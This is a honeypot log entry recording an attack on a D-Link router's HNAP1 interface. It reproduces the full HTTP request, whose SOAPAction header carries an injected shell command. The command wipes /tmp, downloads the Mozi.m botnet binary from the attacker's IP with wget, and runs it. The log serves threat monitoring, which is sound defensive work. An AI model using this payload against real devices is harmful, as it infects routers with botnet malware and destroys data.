Time | 2025/01/27, 10:22:13 (GMT) |
Transaction ID | B9QGW148QUB2K63V |
Service | http |
Location | BR (Brazil) |
Attacker | 45.164.177.13 |
Classification | D-link overflow |
Harm Potential | High |
POST /HNAP1/ HTTP/1.0 Host: 46.4.222.114:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://45.164.177.13:10885/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |